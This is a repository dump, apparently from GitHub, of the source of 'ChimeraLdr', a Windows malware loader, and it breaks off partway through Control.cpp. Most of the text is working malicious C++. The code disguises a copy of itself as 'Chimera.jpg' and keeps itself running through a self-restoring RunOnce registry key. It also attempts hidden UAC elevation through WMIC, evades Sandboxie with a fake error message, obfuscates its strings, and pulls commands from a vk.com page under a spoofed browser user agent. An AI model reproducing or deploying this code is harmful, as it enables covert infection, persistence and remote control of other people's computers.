├── ChimeraLdr ├── Chimera.cpp ├── Chimera.sln ├── Chimera.vcxproj ├── Chimera.vcxproj.user ├── Control.cpp ├── Control.h ├── Debug │ ├── Chimera.Build.CppClean.log │ ├── Chimera.dll │ ├── Chimera.dll.recipe │ ├── Chimera.exp │ ├── Chimera.ilk │ ├── Chimera.lib │ ├── Chimera.log │ ├── Chimera.obj │ ├── Chimera.pdb │ ├── Chimera.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── Chimera.lastbuildstate │ │ ├── Chimera.write.1u.tlog │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ └── link.write.1.tlog │ ├── Chimera.vcxproj.FileListAbsolute.txt │ ├── Control.obj │ ├── Install.obj │ ├── global.obj │ ├── memory.obj │ ├── urlsaver.obj │ ├── utils.obj │ ├── vc142.idb │ ├── vc142.pdb │ └── vcpkg.applocal.log ├── Install.cpp ├── Install.h ├── Release │ ├── Chimera.Build.CppClean.log │ ├── Chimera.exe │ ├── Chimera.exe.recipe │ ├── Chimera.exp │ ├── Chimera.iobj │ ├── Chimera.ipdb │ ├── Chimera.lib │ ├── Chimera.log │ ├── Chimera.obj │ ├── Chimera.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── Chimera.lastbuildstate │ │ ├── Chimera.write.1u.tlog │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ └── link.write.1.tlog │ ├── Chimera.vcxproj.FileListAbsolute.txt │ ├── Control.obj │ ├── Install.obj │ ├── global.obj │ ├── memory.obj │ ├── urlsaver.obj │ ├── utils.obj │ ├── vc142.pdb │ └── vcpkg.applocal.log ├── global.cpp ├── global.h ├── memory.cpp ├── memory.h ├── mydbg.h ├── urlsaver.cpp ├── urlsaver.h ├── utils.cpp └── utils.h ├── LICENSE └── README.md /ChimeraLdr/Chimera.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | 3 | struct Data 4 | { 5 | WCHAR szSelf[256]; 6 | WCHAR szTemporary1[256]; 7 | WCHAR szTemporary2[256]; 8 | }; 9 | 10 | 11 | BOOL Install() 12 | { 13 | GlobalMemory MyMem(sizeof(Data) + 1); 14 | Data *lpData = (Data*)MyMem.localloc(sizeof(Data)); 15 | if (!lpData) 16 | { 17 | dbg("No memory"); 18 | return FALSE; 19 | } 20 | GetModuleFileNameW(0, lpData->szSelf, 256); 21 | 22 | 23 | HRESULT hRes = SHGetFolderPathW(0, CSIDL_APPDATA | CSIDL_FLAG_CREATE, NULL, SHGFP_TYPE_CURRENT, lpData->szTemporary1); 24 | if (hRes != S_OK) 25 | GetTempPathW(256, lpData->szTemporary1); 26 | 27 | 28 | WCHAR szRandomString[RandomDirectoryLen + 1] = { L'P', L'a', L'i', L'm', L'o', L'n', L'\0' }; 29 | 30 | if (!GenerateRandomString(szRandomString, RandomDirectoryLen)) 31 | dbg("Can not gen random string, using default Paimon"); 32 | wsprintfW(lpData->szTemporary2, L"%s\\%s", lpData->szTemporary1, szRandomString); 33 | 34 | CreateDirectoryW(lpData->szTemporary2, 0); 35 | if (GetLastError() == ERROR_ACCESS_DENIED) 36 | { 37 | dbg("Error: access denied"); 38 | return FALSE; 39 | } 40 | else 41 | { 42 | dbg(L"Created directory ", lpData->szTemporary2); 43 | } 44 | 45 | WCHAR szFileName[] = { L'C', L'h', L'i', L'm', L'e', L'r', L'a', L'.', L'j', L'p', L'g', L'\0' }; 46 | 47 | wsprintfW(lpData->szTemporary1, L"%s\\%s", lpData->szTemporary2, szFileName); 48 | 49 | if (BlockCopy(lpData->szSelf, lpData->szTemporary1)) 50 | { 51 | dbg(L"Wrote self to: ", lpData->szTemporary1); 52 | if (!CreateDllProcess(lpData->szTemporary1)) 53 | { 54 | dbg("Can not create rundll process, loading self"); 55 | HMODULE hSelfModule = LoadLibraryW(lpData->szTemporary1); 56 | 57 | if (hSelfModule) 58 | { 59 | typedef DWORD(_cdecl *lpCHIMERA)(); 60 | lpCHIMERA fnFuncKROBA = (lpCHIMERA)GetProcAddress(hSelfModule, "CHIMERA"); 61 | if (fnFuncKROBA) 62 | { 63 | fnFuncKROBA(); 64 | } 65 | } 66 | 67 | Sleep(INFINITE); 68 | } 69 | } 70 | else 71 | { 72 | dbg(L"Can not copy self to: ", lpData->szTemporary1); 73 | } 74 | 75 | return TRUE; 76 | } 77 | 78 | BOOL SetupPersistence(LPWSTR pKeyName, BOOL isHKLM, LPWSTR pSelf); 79 | 80 | 81 | BOOL HKAutorun(LPWSTR pSelf) 82 | { 83 | HKEY hKey; 84 | 85 | BOOL bRet = FALSE; 86 | 87 | WCHAR RegPath[] = 88 | { 89 | L'S', L'O', L'F', L'T', L'W', L'A', 90 | L'R', L'E', L'\\', L'M', L'i', L'c', 91 | L'r', L'o', L's', L'o', L'f', L't', 92 | L'\\', L'W', L'i', L'n', L'd', L'o', 93 | L'w', L's', L'\\', L'C', L'u', L'r', 94 | L'r', L'e', L'n', L't', L'V', L'e', 95 | L'r', L's', L'i', L'o', L'n', L'\\', 96 | L'R', L'u', L'n', L'O', L'n', L'c', L'e', L'\0' 97 | }; 98 | 99 | GlobalMemory MyMem(1025); 100 | LPWSTR pRunCommandLine = (LPWSTR)MyMem.localloc(1024); 101 | 102 | BOOL bHKLM = TRUE; 103 | 104 | WCHAR wsprintfString[] = 105 | { 106 | L'r', L'u', L'n', L'd', L'l', L'l', L'3', L'2', L'.', L'e', L'x', L'e', L' ', L'\"', L'%', L's', L'\"', L',', L'C', L'H', L'I', L'M', L'E', L'R', L'A', L'\0' 107 | }; 108 | 109 | wsprintfW(pRunCommandLine, wsprintfString, pSelf); 110 | 111 | dbg(L"Adding to registry: ", pSelf); 112 | 113 | DWORD ret = RegCreateKeyExW(HKEY_LOCAL_MACHINE, RegPath, 0, 0, 0, KEY_ALL_ACCESS, 0, &hKey, 0); 114 | 115 | if (ret != ERROR_SUCCESS) 116 | { 117 | dbg(L"HKLM error, adding to HKCU"); 118 | DWORD ret = RegCreateKeyExW(HKEY_CURRENT_USER, RegPath, 0, 0, 0, KEY_ALL_ACCESS, 0, &hKey, 0); 119 | bHKLM = FALSE; 120 | } 121 | else 122 | { 123 | dbg(L"Adding to HKLM"); 124 | } 125 | 126 | if (ret == ERROR_SUCCESS) 127 | { 128 | 129 | WCHAR szRandomString[RandomDirectoryLen + 1] = { L'P', L'a', L'i', L'm', L'o', L'n', L'\0' }; 130 | 131 | if (!GenerateRandomString(szRandomString, RandomDirectoryLen)) 132 | dbg("Can not gen random string, using default SuperBear"); 133 | 134 | ret = RegSetValueExW(hKey, szRandomString, 0, REG_SZ, (LPBYTE)pRunCommandLine, lstrlenW(pRunCommandLine) * 2); 135 | if (ret != ERROR_SUCCESS) 136 | { 137 | dbg("Error setting value"); 138 | } 139 | else 140 | { 141 | bRet = TRUE; 142 | 143 | SetupPersistence(szRandomString, bHKLM, pSelf); 144 | } 145 | RegCloseKey(hKey); 146 | } 147 | else 148 | { 149 | dbg("Error adding to registry"); 150 | } 151 | return bRet; 152 | } 153 | 154 | struct PersistenceInformation 155 | { 156 | WCHAR pKeyName[256]; 157 | WCHAR pSelf[256]; 158 | BOOL bHKLM; 159 | }; 160 | 161 | DWORD WINAPI ProtectRegistry(PersistenceInformation *lpPersistence) 162 | { 163 | #ifdef _DEBUG 164 | if (lpPersistence->bHKLM) 165 | dbg(L"[Persistence] protecting keyname in HKLM: ", lpPersistence->pKeyName); 166 | else 167 | dbg(L"[Persistence] pretecting keyname in HKCU: ", lpPersistence->pKeyName); 168 | #endif 169 | 170 | 171 | HKEY hKey; 172 | 173 | 174 | WCHAR RegPath[] = 175 | { 176 | L'S', L'O', L'F', L'T', L'W', L'A', 177 | L'R', L'E', L'\\', L'M', L'i', L'c', 178 | L'r', L'o', L's', L'o', L'f', L't', 179 | L'\\', L'W', L'i', L'n', L'd', L'o', 180 | L'w', L's', L'\\', L'C', L'u', L'r', 181 | L'r', L'e', L'n', L't', L'V', L'e', 182 | L'r', L's', L'i', L'o', L'n', L'\\', 183 | L'R', L'u', L'n', L'O', L'n', L'c', L'e', L'\0' 184 | }; 185 | 186 | DWORD ret; 187 | if (lpPersistence->bHKLM) 188 | ret = RegCreateKeyExW(HKEY_LOCAL_MACHINE, RegPath, 0, 0, 0, KEY_ALL_ACCESS, 0, &hKey, 0); 189 | else 190 | ret = RegCreateKeyExW(HKEY_CURRENT_USER, RegPath, 0, 0, 0, KEY_ALL_ACCESS, 0, &hKey, 0); 191 | 192 | if (ret == ERROR_SUCCESS) 193 | { 194 | if (RegNotifyChangeKeyValue(hKey, TRUE, REG_NOTIFY_CHANGE_LAST_SET, 0, FALSE) == ERROR_SUCCESS) 195 | { 196 | if (HKAutorun(lpPersistence->pSelf)) 197 | dbg("[Persistence] restored"); 198 | else 199 | dbg("[Persistence] can not restore value"); 200 | } 201 | RegCloseKey(hKey); 202 | } 203 | else 204 | { 205 | dbg("[Persistence] Reg create error"); 206 | } 207 | ExitThread(0); 208 | } 209 | 210 | BOOL SetupPersistence(LPWSTR pKeyName, BOOL isHKLM, LPWSTR pSelf) 211 | { 212 | PersistenceInformation *lpPersistence = (PersistenceInformation*)VirtualAlloc(0, sizeof(PersistenceInformation), MEM_COMMIT | MEM_RESERVE, 213 | PAGE_READWRITE); 214 | 215 | if (lpPersistence) 216 | { 217 | lstrcpyW(lpPersistence->pKeyName, pKeyName); 218 | lstrcpyW(lpPersistence->pSelf, pSelf); 219 | lpPersistence->bHKLM = isHKLM; 220 | HANDLE hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ProtectRegistry, (LPVOID)lpPersistence, 0, 0); 221 | if (!hThread) 222 | dbg("Can not create thread to protect registry"); 223 | } 224 | 225 | return FALSE; 226 | } 227 | 228 | 229 | BOOL HostProcessSvchost() 230 | { 231 | return FALSE; 232 | } 233 | 234 | BOOL SvchostAutorun() 235 | { 236 | return FALSE; 237 | } 238 | 239 | VOID AddStartup(LPWSTR pSelf) 240 | { 241 | 242 | 243 | if (HostProcessSvchost()) 244 | return; 245 | 246 | if (!SvchostAutorun()) 247 | { 248 | dbg("Error adding self to svchost"); 249 | if (!HKAutorun(pSelf)) 250 | { 251 | dbg("Error adding self to HKCU"); 252 | } 253 | else 254 | { 255 | dbg("Succeeded run in runonce"); 256 | } 257 | } 258 | } 259 | 260 | DWORD WINAPI LdrMain(PWCHAR pSelf) 261 | { 262 | AddStartup(pSelf); 263 | 264 | CreateMutexW(0, 0, L"CHIMERA-LDRA-VITMA-YAWA"); 265 | DWORD dwLastErr = GetLastError(); 266 | 267 | if ((dwLastErr == ERROR_ACCESS_DENIED) || (dwLastErr == ERROR_ALREADY_EXISTS)) 268 | { 269 | dbg("Already running"); 270 | ExitProcess(0); 271 | } 272 | 273 | #ifdef _DEBUG 274 | MessageBoxW(0, L"LdrMain", L"LdrMain", 0); 275 | #endif 276 | 277 | ControlMain(); 278 | 279 | ExitThread(0); 280 | } 281 | 282 | 283 | BOOL IsUserElevatedAdmin() 284 | { 285 | SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; 286 | PSID SecurityIdentifier; 287 | if (!AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &SecurityIdentifier)) 288 | return 0; 289 | 290 | BOOL IsAdminMember; 291 | 292 | HMODULE ntdll = GetModuleHandleA("advapi32.dll"); 293 | typedef BOOL(__stdcall *ttCheckTokenMembership1)(HANDLE, PSID, PBOOL); 294 | ttCheckTokenMembership1 CheckTokenMembership1 = (ttCheckTokenMembership1)GetProcAddress(ntdll, "CheckTokenMembership"); 295 | 296 | if (!CheckTokenMembership1(NULL, SecurityIdentifier, &IsAdminMember)) 297 | IsAdminMember = FALSE; 298 | 299 | FreeSid(SecurityIdentifier); 300 | 301 | return IsAdminMember; 302 | } 303 | DWORD getBuildNumber() 304 | { 305 | DWORD dwVersion = 0; 306 | DWORD dwBuild = 0; 307 | dwVersion = GetVersion(); 308 | 309 | if (dwVersion < 0x80000000) 310 | dwBuild = (DWORD)(HIWORD(dwVersion)); 311 | return dwBuild; 312 | } 313 | void LowExit(LPWSTR lpSelf) 314 | { 315 | if (!IsUserElevatedAdmin() && getBuildNumber() > 5112) 316 | { 317 | WCHAR szCommand[512]; 318 | WCHAR szWMICPath[256]; 319 | 320 | dbg("Elevating uac"); 321 | 322 | WCHAR EnvirString[] = 323 | { 324 | L'%', L'w', L'i', L'n', L'd', L'i', L'r', 325 | L'%', L'\\', L's', L'y', L's', L't', L'e', 326 | L'm', L'3', L'2', L'\\', L'w', L'b', L'e', 327 | L'm', L'\\', L'w', L'm', L'i', L'c', L'\0', 328 | }; 329 | ExpandEnvironmentStringsW(EnvirString, szWMICPath, 255); 330 | 331 | dbg(L"WMI path: ", szWMICPath); 332 | 333 | WCHAR lpCommandLineString[] = 334 | { 335 | L'p', L'r', L'o', L'c', L'e', L's', 336 | L's', L' ', L'c', L'a', L'l', L'l', 337 | L' ', L'c', L'r', L'e', L'a', L't', 338 | L'e', L' ', L'\"', L'c', L'm', L'd', 339 | L' ', L'/', L'c', L' ', L's', L't', 340 | L'a', L'r', L't', L' ', L'%', L's', 341 | L'\"', L'\0' 342 | }; 343 | wsprintfW(szCommand, lpCommandLineString, lpSelf); 344 | 345 | dbg(L"WMI Query: ", szCommand); 346 | 347 | GlobalMemory MyMem(sizeof(SHELLEXECUTEINFO)+1); 348 | LPSHELLEXECUTEINFO shExInfo = (LPSHELLEXECUTEINFO)MyMem.localloc(sizeof(SHELLEXECUTEINFO)); 349 | 350 | if (!shExInfo) 351 | { 352 | dbg("Error: no memory in uac elevation"); 353 | } 354 | 355 | 356 | shExInfo->cbSize = sizeof(SHELLEXECUTEINFO); 357 | shExInfo->fMask = SEE_MASK_NOCLOSEPROCESS; 358 | shExInfo->hwnd = 0; 359 | WCHAR RunAsStr[] = 360 | { 361 | L'r', L'u', L'n', L'a', L's', L'\0' 362 | }; 363 | shExInfo->lpVerb = RunAsStr; 364 | shExInfo->lpFile = szWMICPath; 365 | shExInfo->lpParameters = szCommand; 366 | shExInfo->lpDirectory = 0; 367 | shExInfo->nShow = SW_HIDE; 368 | shExInfo->hInstApp = 0; 369 | 370 | DWORD ElevationTries = 0; 371 | do 372 | { 373 | if (ShellExecuteEx(shExInfo)) 374 | { 375 | WaitForSingleObject(shExInfo->hProcess, INFINITE); 376 | dbg("WMI, elevation succeed"); 377 | CloseHandle(shExInfo->hProcess); 378 | ExitProcess(0); 379 | } 380 | else 381 | { 382 | dbg("Elevation failed"); 383 | } 384 | ElevationTries++; 385 | } while (ElevationTries < MAX_ELEVATE_TRIES); 386 | } 387 | else 388 | { 389 | dbg("UAC elevation is not required"); 390 | } 391 | } 392 | 393 | typedef DWORD(WINAPI *fnGetModuleFileNameW)(HMODULE, PWCHAR, DWORD); 394 | 395 | VOID GetFuncModuleFileName(fnGetModuleFileNameW *lpFunc) 396 | { 397 | CHAR KernelLib[] = 398 | { 399 | 'K', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', '\0' 400 | }; 401 | 402 | CHAR szGetModuleFileNameW[] = 403 | { 404 | 'G', 'e', 't', 'M', 'o', 'd', 405 | 'u', 'l', 'e', 'F', 'i', 'l', 406 | 'e', 'N', 'a', 'm', 'e', 'W', 407 | '\0' 408 | }; 409 | 410 | *lpFunc = (fnGetModuleFileNameW)GetProcAddress(GetModuleHandleA(KernelLib), szGetModuleFileNameW); 411 | } 412 | 413 | extern "C" __declspec(dllexport) 414 | DWORD _cdecl CHIMERA() 415 | { 416 | GlobalMemory MyMem(1024); 417 | LPWSTR pSelf = (LPWSTR)MyMem.localloc(513); 418 | HMODULE SelfModule; 419 | 420 | GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS | GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, (LPCWSTR)&CHIMERA, &SelfModule); 421 | 422 | fnGetModuleFileNameW lpGetModuleFileNameW; 423 | 424 | GetFuncModuleFileName(&lpGetModuleFileNameW); 425 | 426 | if (lpGetModuleFileNameW) 427 | { 428 | lpGetModuleFileNameW(SelfModule, pSelf, 256); 429 | } 430 | 431 | 432 | LdrMain(pSelf); 433 | return 0; 434 | } 435 | 436 | VOID antiAnalysis() 437 | { 438 | WCHAR SandboxieDLL[] = 439 | { 440 | L'S', L'b', L'i', L'e', 441 | L'D', L'l', L'l', L'.', 442 | L'd', L'l', L'l', L'\0', 443 | }; 444 | 445 | if (GetModuleHandleW(SandboxieDLL)) 446 | { 447 | MessageBoxW(0, L"Error: this is not document either it is corrupted. Try to run out of Sandboxie", L"Sandboxie error", MB_ICONERROR); 448 | ExitProcess(0); 449 | } 450 | } 451 | 452 | DWORD _cdecl DLLMain(HINSTANCE hInstDLL, DWORD fdwReason, LPVOID lpReserved) 453 | { 454 | GetCommandLineA(); 455 | 456 | 457 | GlobalMemory MyMem(1024); 458 | LPWSTR pSelf = (LPWSTR)MyMem.localloc(513); 459 | HMODULE SelfModule; 460 | 461 | GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS | GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, (LPCWSTR)&DLLMain, &SelfModule); 462 | 463 | 464 | fnGetModuleFileNameW lpGetModuleFileNameW; 465 | 466 | GetFuncModuleFileName(&lpGetModuleFileNameW); 467 | 468 | if (lpGetModuleFileNameW) 469 | { 470 | lpGetModuleFileNameW(SelfModule, pSelf, 256); 471 | } 472 | 473 | 474 | antiAnalysis(); 475 | 476 | if (IsLibrary(SelfModule)) 477 | { 478 | switch (fdwReason) 479 | { 480 | case DLL_PROCESS_ATTACH: 481 | 482 | 483 | dbg(L"Loaded as dll ", pSelf); 484 | LdrMain(pSelf); 485 | break; 486 | case DLL_PROCESS_DETACH: 487 | dbg(L"Detached from process ", pSelf); 488 | break; 489 | } 490 | return TRUE; 491 | } 492 | else 493 | { 494 | 495 | dbg(L"Started as exe file ", pSelf); 496 | 497 | LowExit(pSelf); 498 | 499 | if (!Install()) 500 | dbg(L"Installation failed"); 501 | 502 | ExitProcess(0); 503 | } 504 | } 505 | -------------------------------------------------------------------------------- /ChimeraLdr/Chimera.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31105.61 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Chimera", "Chimera.vcxproj", "{9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x86 = Debug|x86 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F}.Debug|x86.ActiveCfg = Debug|Win32 15 | {9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F}.Debug|x86.Build.0 = Debug|Win32 16 | {9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F}.Release|x86.ActiveCfg = Release|Win32 17 | {9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F}.Release|x86.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {136DFFC6-3C5C-4E00-BCDE-9EDF54992852} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /ChimeraLdr/Chimera.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {9B13FB0C-CFB6-40E9-8ED7-8FA04FE47A5F} 15 | Chimera 16 | 10.0 17 | 18 | 19 | 20 | DynamicLibrary 21 | true 22 | v142 23 | MultiByte 24 | 25 | 26 | Application 27 | false 28 | v142 29 | true 30 | Unicode 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | Level3 46 | Disabled 47 | true 48 | 49 | 50 | true 51 | 52 | 53 | 54 | 55 | Level3 56 | MaxSpeed 57 | true 58 | true 59 | true 60 | MultiThreaded 61 | false 62 | false 63 | 64 | 65 | false 66 | true 67 | true 68 | Windows 69 | DLLMain 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | -------------------------------------------------------------------------------- /ChimeraLdr/Chimera.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ChimeraLdr/Control.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | 3 | static const unsigned char pr2six[256] = 4 | { 5 | /* ASCII table */ 6 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 7 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 8 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 9 | 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, 10 | 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 11 | 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, 12 | 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 13 | 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 14 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 15 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 16 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 17 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 18 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 19 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 20 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 21 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64 22 | }; 23 | 24 | int Base64decode_len(const char *bufcoded) 25 | { 26 | int nbytesdecoded; 27 | register const unsigned char *bufin; 28 | register int nprbytes; 29 | 30 | bufin = (const unsigned char *)bufcoded; 31 | while (pr2six[*(bufin++)] <= 63); 32 | 33 | nprbytes = (bufin - (const unsigned char *)bufcoded) - 1; 34 | nbytesdecoded = ((nprbytes + 3) / 4) * 3; 35 | 36 | return nbytesdecoded + 1; 37 | } 38 | 39 | int Base64decode(char *bufplain, const char *bufcoded) 40 | { 41 | int nbytesdecoded; 42 | register const unsigned char *bufin; 43 | register unsigned char *bufout; 44 | register int nprbytes; 45 | 46 | bufin = (const unsigned char *)bufcoded; 47 | while (pr2six[*(bufin++)] <= 63); 48 | nprbytes = (bufin - (const unsigned char *)bufcoded) - 1; 49 | nbytesdecoded = ((nprbytes + 3) / 4) * 3; 50 | 51 | bufout = (unsigned char *)bufplain; 52 | bufin = (const unsigned char *)bufcoded; 53 | 54 | while (nprbytes > 4) { 55 | *(bufout++) = 56 | (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 57 | *(bufout++) = 58 | (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 59 | *(bufout++) = 60 | (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 61 | bufin += 4; 62 | nprbytes -= 4; 63 | } 64 | 65 | 66 | if (nprbytes > 1) { 67 | *(bufout++) = 68 | (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 69 | } 70 | if (nprbytes > 2) { 71 | *(bufout++) = 72 | (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 73 | } 74 | if (nprbytes > 3) { 75 | *(bufout++) = 76 | (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 77 | } 78 | 79 | *(bufout++) = '\0'; 80 | nbytesdecoded -= (4 - nprbytes) & 3; 81 | return nbytesdecoded; 82 | } 83 | 84 | HINTERNET OpenInternet(LPWSTR UserAgent) 85 | { 86 | HINTERNET hRet = InternetOpenW(UserAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 87 | 88 | if (!hRet) 89 | { 90 | hRet = InternetOpenW(UserAgent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, INTERNET_FLAG_ASYNC); 91 | } 92 | return hRet; 93 | } 94 | 95 | 96 | wchar_t * __cdecl mystrstr( 97 | wchar_t * str1, 98 | wchar_t * str2 99 | ) 100 | { 101 | wchar_t*cp = (wchar_t*)str1; 102 | wchar_t*s1, *s2; 103 | 104 | if (!*str2) 105 | return((wchar_t*)str1); 106 | 107 | while (*cp) 108 | { 109 | s1 = cp; 110 | s2 = (wchar_t*)str2; 111 | 112 | while (*s1 && *s2 && !(*s1 - *s2)) 113 | s1++, s2++; 114 | 115 | if (!*s2) 116 | return(cp); 117 | 118 | cp++; 119 | } 120 | 121 | return(NULL); 122 | } 123 | 124 | char * __cdecl mystrstr( 125 | char * str1, 126 | char * str2 127 | ) 128 | { 129 | char*cp = (char*)str1; 130 | char*s1, *s2; 131 | 132 | if (!*str2) 133 | return((char*)str1); 134 | 135 | while (*cp) 136 | { 137 | s1 = cp; 138 | s2 = (char*)str2; 139 | 140 | while (*s1 && *s2 && !(*s1 - *s2)) 141 | s1++, s2++; 142 | 143 | if (!*s2) 144 | return(cp); 145 | 146 | cp++; 147 | } 148 | 149 | return(NULL); 150 | 151 | } 152 | 153 | BOOL ParseHtml(PCHAR szHtml, DWORD dwSize, PCHAR *pOut) 154 | { 155 | 156 | PCHAR pCommand = mystrstr(szHtml, WATERMARK); 157 | if (pCommand) 158 | { 159 | pCommand += lstrlenA(WATERMARK); 160 | *pOut = pCommand; 161 | return TRUE; 162 | } 163 | return FALSE; 164 | } 165 | 166 | BOOL GetCommand(PCHAR pCommandOutput, LPWSTR pUserId) 167 | { 168 | dbg(L"Trying to get command from: ", pUserId); 169 | BOOL bRet = FALSE; 170 | HINTERNET hInternet; 171 | 172 | WCHAR szUserAgent[] = 173 | { 174 | L'M', L'o', L'z', L'i', L'l', L'l', L'a', 175 | L'/', L'5', L'.', L'0', L' ', L'(', L'W', L'i', 176 | L'n', L'd', L'o', L'w', L's', L' ', L'N', 177 | L'T', L' ', L'6', L'.', L'1', L';', L' ', 178 | L'W', L'O', L'W', L'6', L'4', L')', L' ', 179 | L'A', L'p', L'p', L'l', L'e', L'W', L'e', 180 | L'b', L'K', L'i', L't', L'/', L'5', L'3', 181 | L'7', L'.', L'3', L'6', L' ', L'(', L'K', 182 | L'H', L'T', L'M', L'L', L',', L' ', L'l', L'i', 183 | L'k', L'e', L' ', L'G', L'e', L'c', L'k', 184 | L'o', L')', L' ', L'C', L'h', L'r', L'o', 185 | L'm', L'e', L'/', L'5', L'5', L'.', L'0', 186 | L'.', L'2', L'8', L'8', L'3', L'.', L'8', 187 | L'7', L' ', L'S', L'a', L'f', L'a', L'r', 188 | L'i', L'/', L'5', L'3', L'7', L'.', L'3', 189 | L'6', L'\0' 190 | }; 191 | 192 | 193 | 194 | 195 | dbg(L"Using UserAgent: ", szUserAgent); 196 | do 197 | { 198 | hInternet = OpenInternet(szUserAgent); 199 | } while (!hInternet); 200 | 201 | HINTERNET hConnect; 202 | do 203 | { 204 | dbg(L"Connecting to vk.com"); 205 | hConnect = InternetConnectW(hInternet, L"vk.com", INTERNET_DEFAULT_HTTPS_PORT, L"", L"", INTERNET_SERVICE_HTTP, 0, 0); 206 | } while ((!hConnect) || (Sleep(10000), FALSE)); 207 | 208 | WCHAR GetSz[] = 209 | { 210 | L'G', L'E', L'T', L'\0' 211 | }; 212 | 213 | WCHAR HttpVersz[] = 214 | { 215 | L'H', L'T', L'T', L'P', L'/', L'1', L'.', L'1', '\0' 216 | }; 217 | 218 | dbg(L"Connected to vk.com"); 219 | 220 | HINTERNET hRequest = HttpOpenRequestW(hConnect, GetSz, pUserId, HttpVersz, 0, 0, 221 | INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | 222 | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | 223 | INTERNET_FLAG_NO_AUTH | 224 | INTERNET_FLAG_NO_CACHE_WRITE | 225 | INTERNET_FLAG_NO_UI | 226 | INTERNET_FLAG_SECURE | 227 | INTERNET_FLAG_PRAGMA_NOCACHE | 228 | INTERNET_FLAG_RELOAD, NULL); 229 | 230 | if (hRequest) 231 | { 232 | dbg(L"Request opened"); 233 | if (HttpSendRequestW(hRequest, 0, 0, 0, 0)) 234 | { 235 | dbg("Request sent"); 236 | PCHAR pResponse = (PCHAR)VirtualAlloc(0, 10240, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 237 